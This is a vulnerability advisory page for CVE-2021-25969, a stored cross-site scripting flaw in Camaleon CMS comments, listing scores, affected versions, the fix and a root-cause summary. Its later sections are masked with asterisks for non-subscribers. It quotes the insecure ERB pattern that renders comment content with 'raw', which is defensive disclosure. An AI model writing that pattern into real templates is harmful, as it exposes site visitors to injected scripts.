Miggo Logo

CVE-2021-25969: Camaleon CMS Stored Cross-site Scripting vulnerability

6.1

CVSS Score
3.1

Basic Information

EPSS Score
0.82163%
Published
5/24/2022
Updated
1/26/2023
KEV Status
No
Technology
TechnologyRuby

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Package NameEcosystemVulnerable VersionsFirst Patched Version
camaleon_cmsrubygems>= 0.0.1, < 2.6.0.12.6.0.1

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from unsanitized rendering of user-controlled comment content. The patch diff shows:

  1. Removal of 'raw' keyword in ERB templates (which bypasses HTML escaping)
  2. Addition of 'sanitize' helper in comment_helper.rb
  3. Multiple template files previously used <%= raw comment.content %> which directly renders user input as HTML. This pattern matches classic stored XSS vulnerability patterns where untrusted user input is rendered without proper escaping/sanitization.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

In “**m*l*on *MS” *ppli**tion, v*rsions *.*.* t*rou** *.*.* *r* vuln*r**l* to stor** XSS, t**t *llows unprivil**** *ppli**tion us*rs to stor* m*li*ious s*ripts in t** *omm*nts s**tion o* t** post. T**s* s*ripts *r* *x**ut** in * vi*tim’s *rows*r w**n

Reasoning

T** vuln*r**ility st*ms *rom uns*nitiz** r*n**rin* o* us*r-*ontroll** *omm*nt *ont*nt. T** p*t** *i** s*ows: *. R*mov*l o* 'r*w' k*ywor* in *R* t*mpl*t*s (w*i** *yp*ss*s *TML *s**pin*) *. ***ition o* 's*nitiz*' **lp*r in *omm*nt_**lp*r.r* *. Multipl*